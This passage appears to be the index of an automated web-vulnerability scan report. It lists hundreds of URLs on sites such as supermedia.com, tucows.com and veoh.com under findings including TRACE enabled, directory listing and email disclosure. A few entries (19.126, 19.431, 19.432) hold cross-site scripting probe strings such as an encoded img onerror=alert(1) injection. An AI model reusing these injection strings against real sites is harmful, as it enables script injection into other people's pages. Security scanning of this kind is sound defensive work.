19.7. http://ad.doubleclick.net/adi/lb.buzzillions/

19.8. http://ad.doubleclick.net/adi/lb.buzzillions/

19.9. http://ad.doubleclick.net/adi/lb.buzzillions/

19.10. http://advertise.tucows.com/

19.11. http://app.scanscout.com/ssframework/adStreamJSController.htm

19.12. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

19.13. http://blog.supermedia.com/

19.14. http://blog.supermedia.com/2011/01/2011-changes/

19.15. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

19.16. http://blog.supermedia.com/2011/01/getting-in-shape-tips/

19.17. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/

19.18. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/

19.19. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/

19.20. http://blog.supermedia.com/2011/02/build-brand/

19.21. http://blog.supermedia.com/2011/02/go-marketing/

19.22. http://blog.supermedia.com/2011/02/planning-appreciation-events/

19.23. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/

19.24. http://blog.supermedia.com/archives/

19.25. http://blog.supermedia.com/archives/news/

19.26. http://blog.supermedia.com/archives/newsletters/

19.27. http://blog.supermedia.com/archives/press-releases/

19.28. http://blog.supermedia.com/archives/tips/

19.29. http://boardreader.com/

19.30. http://boardreader.com/index.php

19.31. http://boardreader.com/my.html

19.32. http://boardreader.com/my/signup.html

19.33. http://boardreader.com/pop/articles/-/-/7.html

19.34. http://boardreader.com/pop/domains.html

19.35. http://boardreader.com/pop/films/-/-/3.html

19.36. http://boardreader.com/pop/instructions/-/-/7.html

19.37. http://boardreader.com/pop/news/-/-/3.html

19.38. http://boardreader.com/pop/projects.html

19.39. http://boardreader.com/pop/releases/-/-/3.html

19.40. http://boardreader.com/pop/sites.html

19.41. http://boardreader.com/pop/topics.html

19.42. http://boardreader.com/pop/videos/-/-/3.html

19.43. http://cherne.net/brian/resources/jquery.hoverIntent.html

19.44. http://clicktoverify.truste.com/pvr.php

19.45. http://code.google.com/p/simplemodal/

19.46. http://code.google.com/p/swfobject/

19.47. http://core.videoegg.com/eap/12368/html/jstags.html

19.48. http://dean.edwards.name/weblog/2006/03/base/

19.49. http://developer.yahoo.com/yui/

19.50. http://developer.yahoo.com/yui/license.html

19.51. http://digg.com/submit

19.52. http://digg.com/submit

19.53. http://docs.jquery.com/Favicon.ico

19.54. http://docs.jquery.com/UI

19.55. http://docs.jquery.com/UI/Accordion

19.56. http://docs.jquery.com/UI/Autocomplete

19.57. http://docs.jquery.com/UI/Button

19.58. http://docs.jquery.com/UI/Datepicker

19.59. http://docs.jquery.com/UI/Dialog

19.60. http://docs.jquery.com/UI/Effects/

19.61. http://docs.jquery.com/UI/Effects/Slide

19.62. http://docs.jquery.com/UI/Menu

19.63. http://docs.jquery.com/UI/Progressbar

19.64. http://docs.jquery.com/UI/Resizable

19.65. http://docs.jquery.com/UI/Selectable

19.66. http://docs.jquery.com/UI/Slider

19.67. http://docs.jquery.com/UI/Tabs

19.68. http://docs.jquery.com/UI/Theming/API

19.69. http://dojotoolkit.org/community/licensing.shtml

19.70. http://domainhelp.tucows.com/

19.71. http://domainhelp.tucows.com/domains/whois/whoislookup/

19.72. http://download.cnet.com/SmartDraw-2010/3000-2075_4-10002466.html/x22

19.73. http://echealthinsurance.com/

19.74. http://en.wikipedia.org/wiki/Associated_Broadcasting_Company/x22

19.75. http://en.wikipedia.org/wiki/SmartDraw/x22

19.76. http://forums.digitalpoint.com/showthread.php

19.77. http://googleads.g.doubleclick.net/pagead/ads

19.78. http://googleads.g.doubleclick.net/pagead/ads

19.79. http://googleads.g.doubleclick.net/pagead/ads

19.80. http://groups.google.com/grphp

19.81. http://ir.supermedia.com/stockquote.cfm

19.82. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewFeature

19.83. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMovie

19.84. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMultiRoom

19.85. http://itunes.apple.com/us/album/i-need-doctor-feat-eminem/id415573229

19.86. http://itunes.apple.com/us/app/dead-space/id396018321

19.87. http://itunes.apple.com/us/app/the-daily/id411516732

19.88. http://itunes.apple.com/us/app/wild-about-books/id407309460

19.89. http://itunes.apple.com/us/artist/the-beatles/id136975

19.90. http://itunes.apple.com/us/browse/

19.91. http://itunes.apple.com/us/genre/mobile-software-applications/id36

19.92. http://itunes.apple.com/us/store

19.93. http://jquery.com/

19.94. http://jquery.org/license

19.95. http://jqueryui.com/about

19.96. http://jqueryui.com/themeroller/

19.97. http://mad4milk.net/

19.98. http://malsup.com/jquery/block/

19.99. http://managedq.com/search.php

19.100. http://maps.google.com/maps/stk/lc

19.101. http://mootools.net/developers/

19.102. http://nowhiringtoday.jobamatic.com/a/jobs/find-jobs/q-Honda+Research+Development+America/x22

19.103. http://opensource.org/licenses/lgpl-license.php

19.104. http://opensource.org/licenses/mit-license.php

19.105. http://pagead2.googlesyndication.com/pagead/s/iframes_api_loader.html

19.106. http://prototypejs.org/

19.107. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22

19.108. http://qooxdoo.org/

19.109. http://search-cube.com/

19.110. http://shopping.yahoo.com/search

19.111. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

19.112. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html

19.113. https://store.apple.com/us/sign_in

19.114. http://training.apple.com/

19.115. http://twitter.com/supermedia

19.116. http://www.abc3340.com/Global/story.asp

19.117. http://www.agame.com/

19.118. http://www.allianz.com.au/car-insurance/

19.119. http://www.amazon.com/s/

19.120. http://www.apple.com/buy/locator/

19.121. http://www.apple.com/itunes/

19.122. http://www.apple.com/itunes/charts/songs/

19.123. http://www.atlastravelweb.com/

19.124. http://www.bizfind.us/

19.125. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22

19.126. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

19.127. http://www.boldchat.com/

19.128. http://www.butterscotch.com/

19.129. http://www.butterscotch.com/tutorials.html

19.130. http://www.casinotop10.net/

19.131. http://www.city-data.com/zips/48083.html/x22

19.132. http://www.cloudscan.me/

19.133. http://www.cloudscan.me/2010/12/ad-cdn-http-header-injection-cwe-113.html

19.134. http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html

19.135. http://www.cloudscan.me/2011/01/security-researcher-acknowledgments-for.html

19.136. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html

19.137. http://www.cloudscan.me/search

19.138. http://www.cloudscan.me/search/label/CWE-113

19.139. http://www.cloudscan.me/search/label/CWE-89

19.140. http://www.cloudscan.me/search/label/DORK

19.141. http://www.cloudscan.me/search/label/SQL%20Injection

19.142. http://www.descargargratis.com/

19.143. http://www.dhgate.com/

19.144. http://www.dotnetnuke.com/

19.145. http://www.ericmmartin.com/projects/simplemodal/

19.146. http://www.everycarlisted.com/

19.147. http://www.exploit-db.com/

19.148. http://www.exploit-db.com/exploits/16076/

19.149. http://www.exploit-db.com/exploits/16077/

19.150. http://www.exploit-db.com/forums/

19.151. http://www.exploit-db.com/ghdb/1432/

19.152. http://www.exploit-db.com/ghdb/3638/

19.153. http://www.exploit-db.com/ghdb/3668/

19.154. http://www.exploit-db.com/ghdb/3676/

19.155. http://www.exploit-db.com/google-dorks/

19.156. http://www.exploit-db.com/google-dorks/1/

19.157. http://www.exploit-db.com/google-dorks/3/

19.158. http://www.exploit-db.com/google-dorks/4/

19.159. http://www.exploit-db.com/google-dorks/5/

19.160. http://www.exploit-db.com/google-dorks/6/

19.161. http://www.exploit-db.com/google-dorks/7/

19.162. http://www.exploit-db.com/google-hacking-database-updates/

19.163. http://www.exploit-db.com/owned-and-exposed/

19.164. http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/

19.165. http://www.facebook.com/

19.166. http://www.facebook.com/2008/fbml

19.167. http://www.facebook.com/plugins/like.php

19.168. http://www.facebook.com/plugins/like.php

19.169. http://www.facebook.com/share.php

19.170. http://www.facebook.com/share.php

19.171. http://www.facebook.com/supermediacom

19.172. http://www.facebook.com/xd_receiver_v0.4.php

19.173. http://www.flickr.com/search/

19.174. http://www.flickr.com/search/

19.175. http://www.inceptor.com/

19.176. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

19.177. http://www.kminek.pl/lab/yetii/

19.178. http://www.kobobooks.com/

19.179. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863

19.180. http://www.linkedin.com/in/troyd/x22

19.181. http://www.localsearch.com/

19.182. http://www.lwis.net/

19.183. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22

19.184. http://www.manta.com/c/mm8136k/abc-development-inc/x22

19.185. http://www.milanoo.com/

19.186. http://www.msn.com/

19.187. http://www.myservicemonster.com/

19.188. http://www.oakland.edu/cdf/x22

19.189. http://www.opensource.org/licenses/mit-license.php

19.190. http://www.orgplus.com/x22

19.191. http://www.owasp.org/index.php/Top_10_2010-A2

19.192. http://www.pctools.com/

19.193. http://www.quantcast.com/p-aasG6JkxVvmNA

19.194. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/

19.195. http://www.shopireland.ie/

19.196. http://www.stumbleupon.com/submit

19.197. http://www.supermedia.com/about-us

19.198. http://www.supermedia.com/about-us/

19.199. http://www.supermedia.com/about-us/corporate-profile

19.200. http://www.supermedia.com/about-us/executive-team

19.201. http://www.supermedia.com/advertising-goals

19.202. http://www.supermedia.com/business-email

19.203. http://www.supermedia.com/business-listings

19.204. http://www.supermedia.com/business-listings/

19.205. http://www.supermedia.com/business-listings/coupons

19.206. http://www.supermedia.com/business-listings/listing-enhancements-packages

19.207. http://www.supermedia.com/careers

19.208. http://www.supermedia.com/careers/

19.209. http://www.supermedia.com/client-solutions/advertising-goals/

19.210. http://www.supermedia.com/client-solutions/client-stories

19.211. http://www.supermedia.com/client-solutions/local-retail

19.212. http://www.supermedia.com/client-solutions/local-service

19.213. http://www.supermedia.com/client-solutions/local-service/

19.214. http://www.supermedia.com/client-solutions/national-brand-agencies

19.215. http://www.supermedia.com/client-solutions/share-the-wealth

19.216. http://www.supermedia.com/client-solutions/web-based-business

19.217. http://www.supermedia.com/community/barter-network

19.218. http://www.supermedia.com/direct-mail

19.219. http://www.supermedia.com/direct-mail/

19.220. http://www.supermedia.com/direct-mail/call-tracking

19.221. http://www.supermedia.com/direct-mail/compare-direct-mail-options

19.222. http://www.supermedia.com/direct-mail/postcards

19.223. http://www.supermedia.com/direct-mail/shared-card-packs

19.224. http://www.supermedia.com/directory-options

19.225. http://www.supermedia.com/domain-names

19.226. http://www.supermedia.com/ecommerce

19.227. http://www.supermedia.com/help

19.228. http://www.supermedia.com/help/

19.229. http://www.supermedia.com/help/account-information

19.230. http://www.supermedia.com/help/business-listings

19.231. http://www.supermedia.com/help/direct-mail

19.232. http://www.supermedia.com/help/domains-email

19.233. http://www.supermedia.com/help/local-search-marketing

19.234. http://www.supermedia.com/help/online-stores

19.235. http://www.supermedia.com/help/search-marketing-services

19.236. http://www.supermedia.com/help/telephone-service

19.237. http://www.supermedia.com/help/terms-conditions

19.238. http://www.supermedia.com/help/web-hosting

19.239. http://www.supermedia.com/help/web-site-design

19.240. http://www.supermedia.com/help/yellow-pages

19.241. http://www.supermedia.com/local-search-marketing/do-it-yourself

19.242. http://www.supermedia.com/local-search-marketing/services

19.243. http://www.supermedia.com/media-network/affiliate-program

19.244. http://www.supermedia.com/media-network/market-coverage

19.245. http://www.supermedia.com/media-network/mobile

19.246. http://www.supermedia.com/media-network/online-ad-network

19.247. http://www.supermedia.com/media-network/our-brands

19.248. http://www.supermedia.com/media-network/sem-partners

19.249. http://www.supermedia.com/national-agency-products/media-kit

19.250. http://www.supermedia.com/online-advertising

19.251. http://www.supermedia.com/online-advertising/

19.252. http://www.supermedia.com/packaged-solutions

19.253. http://www.supermedia.com/packaged-solutions/

19.254. http://www.supermedia.com/packaged-solutions/auto-dealer-packages

19.255. http://www.supermedia.com/packaged-solutions/business-profile-packages

19.256. http://www.supermedia.com/packaged-solutions/multi-product-packages

19.257. http://www.supermedia.com/press

19.258. http://www.supermedia.com/press/

19.259. http://www.supermedia.com/print-advertising

19.260. http://www.supermedia.com/print-advertising/white-pages

19.261. http://www.supermedia.com/print-advertising/yellow-pages

19.262. http://www.supermedia.com/reputation-monitoring

19.263. http://www.supermedia.com/social-responsibility

19.264. http://www.supermedia.com/social-responsibility/

19.265. http://www.supermedia.com/social-responsibility/commitment-to-employees

19.266. http://www.supermedia.com/social-responsibility/corporate-governance

19.267. http://www.supermedia.com/social-responsibility/environmental-sustainability

19.268. http://www.supermedia.com/social-responsibility/product-use-innovation

19.269. http://www.supermedia.com/social-responsibility/supply-chain

19.270. http://www.supermedia.com/spportal/landingpages.do

19.271. http://www.supermedia.com/support/contact-us

19.272. http://www.supermedia.com/support/contact-us/

19.273. http://www.supermedia.com/support/site-map

19.274. http://www.supermedia.com/trust/privacy-security

19.275. http://www.supermedia.com/trust/social-media-content-disclaimer

19.276. http://www.supermedia.com/trust/terms-of-use

19.277. http://www.supermedia.com/video-ads

19.278. http://www.supermedia.com/web-design

19.279. http://www.supermedia.com/web-hosting

19.280. http://www.supermedia.com/web-sites

19.281. http://www.supermedia.com/web-sites/

19.282. https://www.supermedia.com/about-us

19.283. https://www.supermedia.com/about-us/corporate-profile

19.284. https://www.supermedia.com/about-us/executive-team

19.285. https://www.supermedia.com/about-us/our-clients

19.286. https://www.supermedia.com/advertising-goals

19.287. https://www.supermedia.com/business-listings

19.288. https://www.supermedia.com/business-listings/coupons

19.289. https://www.supermedia.com/business-listings/listing-enhancements-packages

19.290. https://www.supermedia.com/careers

19.291. https://www.supermedia.com/careers/compensation-benefits

19.292. https://www.supermedia.com/careers/core-values

19.293. https://www.supermedia.com/careers/employees-retirees

19.294. https://www.supermedia.com/careers/job-search

19.295. https://www.supermedia.com/careers/professional-development

19.296. https://www.supermedia.com/client-solutions

19.297. https://www.supermedia.com/client-solutions/client-stories

19.298. https://www.supermedia.com/client-solutions/local-retail

19.299. https://www.supermedia.com/client-solutions/local-service

19.300. https://www.supermedia.com/client-solutions/national-brand-agencies

19.301. https://www.supermedia.com/client-solutions/share-the-wealth

19.302. https://www.supermedia.com/client-solutions/web-based-business

19.303. https://www.supermedia.com/community/barter-network

19.304. https://www.supermedia.com/community/newsletter

19.305. https://www.supermedia.com/direct-mail

19.306. https://www.supermedia.com/direct-mail/call-tracking

19.307. https://www.supermedia.com/direct-mail/compare-direct-mail-options

19.308. https://www.supermedia.com/direct-mail/postcards

19.309. https://www.supermedia.com/direct-mail/shared-card-packs

19.310. https://www.supermedia.com/directory-options

19.311. https://www.supermedia.com/domain-names

19.312. https://www.supermedia.com/ecommerce

19.313. https://www.supermedia.com/ecommerce/basic-ecommerce

19.314. https://www.supermedia.com/ecommerce/compare-ecommerce-options

19.315. https://www.supermedia.com/ecommerce/getting-started

19.316. https://www.supermedia.com/ecommerce/premium-ecommerce

19.317. https://www.supermedia.com/ecommerce/unlimited-ecommerce

19.318. https://www.supermedia.com/help

19.319. https://www.supermedia.com/help/account-information

19.320. https://www.supermedia.com/help/business-listings

19.321. https://www.supermedia.com/help/direct-mail

19.322. https://www.supermedia.com/help/domains-email

19.323. https://www.supermedia.com/help/local-search-marketing

19.324. https://www.supermedia.com/help/online-stores

19.325. https://www.supermedia.com/help/search-marketing-services

19.326. https://www.supermedia.com/help/search-marketing-services/reporting

19.327. https://www.supermedia.com/help/telephone-service

19.328. https://www.supermedia.com/help/terms-conditions

19.329. https://www.supermedia.com/help/web-hosting

19.330. https://www.supermedia.com/help/web-site-design

19.331. https://www.supermedia.com/help/yellow-pages

19.332. https://www.supermedia.com/local-search-marketing/do-it-yourself

19.333. https://www.supermedia.com/local-search-marketing/services

19.334. https://www.supermedia.com/marketing-success

19.335. https://www.supermedia.com/media-network/affiliate-program

19.336. https://www.supermedia.com/media-network/market-coverage

19.337. https://www.supermedia.com/media-network/mobile

19.338. https://www.supermedia.com/media-network/online-ad-network

19.339. https://www.supermedia.com/media-network/our-brands

19.340. https://www.supermedia.com/media-network/sem-partners

19.341. https://www.supermedia.com/national-agency-products/media-kit

19.342. https://www.supermedia.com/online-advertising

19.343. https://www.supermedia.com/packaged-solutions

19.344. https://www.supermedia.com/packaged-solutions/auto-dealer-packages

19.345. https://www.supermedia.com/packaged-solutions/business-profile-packages

19.346. https://www.supermedia.com/packaged-solutions/multi-product-packages

19.347. https://www.supermedia.com/press

19.348. https://www.supermedia.com/print-advertising/white-pages

19.349. https://www.supermedia.com/print-advertising/yellow-pages

19.350. https://www.supermedia.com/reputation-monitoring

19.351. https://www.supermedia.com/social-responsibility

19.352. https://www.supermedia.com/spportal/landingpages.do

19.353. https://www.supermedia.com/spportal/spportalFlow.do

19.354. https://www.supermedia.com/support/contact-us

19.355. https://www.supermedia.com/support/site-map

19.356. https://www.supermedia.com/trust/privacy-security

19.357. https://www.supermedia.com/trust/social-media-content-disclaimer

19.358. https://www.supermedia.com/trust/terms-of-use

19.359. https://www.supermedia.com/video-ads

19.360. https://www.supermedia.com/web-design

19.361. https://www.supermedia.com/web-hosting

19.362. https://www.supermedia.com/web-sites

19.363. http://www.superpages.com/

19.364. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22

19.365. http://www.thumbshots.net/search.aspx

19.366. http://www.thumbshots.net/webguide.aspx

19.367. http://www.tucows.com/

19.368. http://www.tucows.com/about.html

19.369. http://www.tucows.com/advertise.html

19.370. http://www.tucows.com/affiliate/index.html

19.371. http://www.tucows.com/author_ratings.html

19.372. http://www.tucows.com/contact.html

19.373. http://www.tucows.com/images/newassets/contact.html

19.374. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

19.375. http://www.tucows.com/images/newassets/includes/js/aalib.js

19.376. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

19.377. http://www.tucows.com/images/newassets/includes/js/show_layer.js

19.378. http://www.tucows.com/images/newassets/includes/js/signupin.js

19.379. http://www.tucows.com/images/newassets/includes/js/x_core.js

19.380. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

19.381. http://www.tucows.com/images/newassets/includes/js/yetii.js

19.382. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

19.383. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

19.384. http://www.tucows.com/images/newassets/javascript:void(null)

19.385. http://www.tucows.com/images/newassets/lostpass.html

19.386. http://www.tucows.com/images/newassets/privacy.html

19.387. http://www.tucows.com/images/newassets/safesearchtoggle.html

19.388. http://www.tucows.com/images/newassets/search.html

19.389. http://www.tucows.com/images/newassets/sitemap.html

19.390. http://www.tucows.com/images/newassets/terms.html

19.391. http://www.tucows.com/images/newassets/warningcow200.png

19.392. http://www.tucows.com/index.html

19.393. http://www.tucows.com/preview/194850/x22

19.394. http://www.tucows.com/privacy.html

19.395. http://www.tucows.com/sitemap.html

19.396. http://www.tucows.com/software.html

19.397. http://www.tucows.com/terms.html

19.398. http://www.tucowsinc.com/

19.399. http://www.tucowsinc.com/careers/

19.400. http://www.veoh.com/

19.401. http://www.veoh.com/browse/groups

19.402. http://www.veoh.com/browse/groups/

19.403. http://www.veoh.com/browse/movies

19.404. http://www.veoh.com/browse/movies/

19.405. http://www.veoh.com/browse/music

19.406. http://www.veoh.com/browse/music/

19.407. http://www.veoh.com/browse/tvshows

19.408. http://www.veoh.com/browse/tvshows/

19.409. http://www.veoh.com/browse/videos

19.410. http://www.veoh.com/browse/videos/category/action_adventure

19.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

19.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5

19.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8

19.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

19.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

19.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

19.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

19.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

19.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN

19.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC

19.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA

19.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

19.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8

19.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

19.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

19.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS

19.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz

19.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

19.429. http://www.veoh.com/browse/videos/category/action_adventure4957f

19.430. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

19.431. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

19.432. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

19.433. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW

19.434. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

19.435. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

19.436. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

19.437. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

19.438. http://www.veoh.com/browse/webseries

19.439. http://www.veoh.com/browse/webseries/

19.440. http://www.veoh.com/browse/webseries/featured/1

19.441. http://www.veoh.com/bulletin

19.442. http://www.veoh.com/collection/Veoh-Editor-Picks

19.443. http://www.veoh.com/corporate/aboutus

19.444. http://www.veoh.com/corporate/copyright

19.445. http://www.veoh.com/corporate/pressroom

19.446. http://www.veoh.com/corporate/privacypolicy

19.447. http://www.veoh.com/corporate/termsofuse

19.448. http://www.veoh.com/download

19.449. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8

19.450. http://www.veoh.com/faq

19.451. http://www.veoh.com/favorites

19.452. http://www.veoh.com/help

19.453. http://www.veoh.com/login

19.454. http://www.veoh.com/messages/inbox

19.455. http://www.veoh.com/metrics/logadevent

19.456. http://www.veoh.com/myinterests

19.457. http://www.veoh.com/myplaylists

19.458. http://www.veoh.com/myprofile/videos

19.459. http://www.veoh.com/publish/video

19.460. http://www.veoh.com/register

19.461. http://www.veoh.com/search/videos/q/-MENUVALUE-

19.462. http://www.veoh.com/search/videos/q/publisher:bunny12344

19.463. http://www.veoh.com/support.html

19.464. http://www.veoh.com/users/JDFox5

19.465. http://www.veoh.com/users/MitchRider

19.466. http://www.veoh.com/users/Veoh-Action-Anime

19.467. http://www.veoh.com/users/Veoh-Horror-Movies

19.468. http://www.veoh.com/users/Veoh-Upcoming-Movies

19.469. http://www.veoh.com/users/bunny12344

19.470. http://www.veoh.com/users/tonysurfs

19.471. http://www.veoh.com/veohtv

19.472. http://www.veoh.com/video/conduit

19.473. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8

19.474. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8

19.475. http://www.veoh.com/xd_receiver.htm

19.476. http://www.waspbarcode.com/scanners/

19.477. http://www.webtoolkit.info/

19.478. http://www.wix.com/

19.479. http://www.youtube.com/

19.480. http://www8.tucows.com/delivery/afr.php

20. File upload functionality

21. TRACE method is enabled

22. Directory listing

23. Email addresses disclosed

23.1. http://ads.gmodules.com/gadgets/makeRequest

23.2. http://ads1.msads.net/ads/1/0000000001_000000000000000151527.gif

23.3. https://author.tucows.com/

23.4. http://boardreader.com/js/dyn/afc90e59a7aa9502c583c11ef4891ce4.js

23.5. http://boardreader.com/opensearch.xml

23.6. http://capec.mitre.org/data/definitions/19.html

23.7. http://cdn.taboolasyndication.com/libtrc/veoh/rbox.en.4-6-1-43135.json

23.8. http://clicktoverify.truste.com/common/css/validate2_1.css

23.9. http://clicktoverify.truste.com/css/styles.css

23.10. http://code.google.com/p/swfobject/

23.11. http://cwe.mitre.org/data/definitions/79.html

23.12. http://cwe.mitre.org/includes/glossarydef.js

23.13. http://dean.edwards.name/weblog/2006/03/base/

23.14. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17

23.15. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7

23.16. https://iforgot.apple.com/myappleid/global/scripts/lib/scriptaculous.js

23.17. http://images.apple.com/global/scripts/lib/event_mixins.js

23.18. http://images.apple.com/global/scripts/lib/scriptaculous.js

23.19. http://ir.supermedia.com/contactus.cfm

23.20. http://ir.supermedia.com/question.cfm

23.21. http://ir.supermedia.com/releasedetail.cfm

23.22. http://ir.supermedia.com/releasedetail.cfm

23.23. http://jquery.com/files/social/js/jquery.tabs.js

23.24. http://jqueryui.com/about

23.25. http://l0.scanscout.com/ssframework/logController.xml

23.26. http://my.supermedia.com/CammsServlet

23.27. http://my.supermedia.com/scripts/javascripts.js

23.28. http://opensource.org/licenses/lgpl-license.php

23.29. http://opensource.org/licenses/mit-license.php

23.30. http://search-cube.com/

23.31. http://static.jquery.com/files/rocker/scripts/custom.js

23.32. http://store.apple.com/us

23.33. http://store.apple.com/us/browse/home/shop_iphone

23.34. http://store.apple.com/us/product/H0374

23.35. http://store.apple.com/us/product/H0614

23.36. http://store.apple.com/us/product/H0691VC/A

23.37. http://store.apple.com/us/product/H0692VC/A

23.38. http://store.apple.com/us/product/H0693VC/A

23.39. http://store.apple.com/us/product/H0694VC/A

23.40. http://store.apple.com/us/product/H0884ZM/A

23.41. http://store.apple.com/us/product/H0997

23.42. http://store.apple.com/us/product/H1411

23.43. http://store.apple.com/us/product/H1549

23.44. http://store.apple.com/us/product/H1663

23.45. http://store.apple.com/us/product/H1938ZM/A

23.46. http://store.apple.com/us/product/H2428LL/A

23.47. http://store.apple.com/us/product/H2431LL/A

23.48. http://store.apple.com/us/product/H2652LL/A

23.49. http://store.apple.com/us/product/H2654LL/A

23.50. http://store.apple.com/us/product/H2841ZM/A

23.51. http://store.apple.com/us/product/H2902VC/A

23.52. http://store.apple.com/us/product/H3200LL/A

23.53. http://store.apple.com/us/product/M9720

23.54. http://store.apple.com/us/product/MA850

23.55. http://store.apple.com/us/product/MA850G/B

23.56. http://store.apple.com/us/product/MB770G/B

23.57. http://store.apple.com/us/product/MB829

23.58. http://store.apple.com/us/product/MB829LL/A

23.59. http://store.apple.com/us/product/MC007

23.60. http://store.apple.com/us/product/MC380

23.61. http://store.apple.com/us/product/MC500

23.62. http://store.apple.com/us/product/MC650

23.63. http://store.apple.com/us/product/MC838

23.64. http://store.apple.com/us/product/MC917ZM/A

23.65. http://store.apple.com/us/product/TP676ZM/A

23.66. http://store.apple.com/us/product/TS232LL/A

23.67. http://store.apple.com/us/product/TS504

23.68. http://store.apple.com/us/product/TS836

23.69. http://store.apple.com/us/product/TS901LL/A

23.70. http://store.apple.com/us/product/TV027VC/A

23.71. http://store.apple.com/us/product/TW256VC/A

23.72. http://store.apple.com/us/product/TW682LL/A

23.73. http://store.apple.com/us/product/TW683LL/A

23.74. http://store.apple.com/us/product/TW684LL/A

23.75. http://store.apple.com/us/product/TW685LL/A

23.76. http://store.apple.com/us/product/TW908

23.77. http://store.apple.com/us/product/TX239VC/A

23.78. http://store.apple.com/us/product/TX381VC/A

23.79. http://store.apple.com/us/product/TX467VC/B

23.80. http://store.apple.com/us/question/answers/product/H1938ZM/A

23.81. http://store.apple.com/us/questions/product/H1938ZM/A

23.82. http://store.apple.com/us_smb_78313

23.83. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

23.84. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1

23.85. https://store.apple.com/rs/js/store/release/apple.js

23.86. http://storeimages.apple.com/1806/store.apple.com/rs/js/store/release/apple.js

23.87. https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/apple.js

23.88. http://www.apple.com/accessibility/itunes/vision.html

23.89. http://www.apple.com/accessibility/macosx/vision.html

23.90. http://www.apple.com/itunes/companies/

23.91. http://www.apple.com/itunes/content-providers/

23.92. http://www.apple.com/itunes/corporatesales/

23.93. http://www.apple.com/pr/

23.94. http://www.apple.com/privacy/

23.95. http://www.cloudscan.me/search/label/CWE-89

23.96. http://www.cloudscan.me/search/label/DORK

23.97. http://www.cloudscan.me/search/label/SQL%20Injection

23.98. http://www.dotnetnuke.com/

23.99. http://www.gnu.org/licenses/gpl.html

23.100. http://www.gnu.org/licenses/lgpl.html

23.101. https://www.google.com/accounts/Login

23.102. https://www.google.com/accounts/ServiceLogin

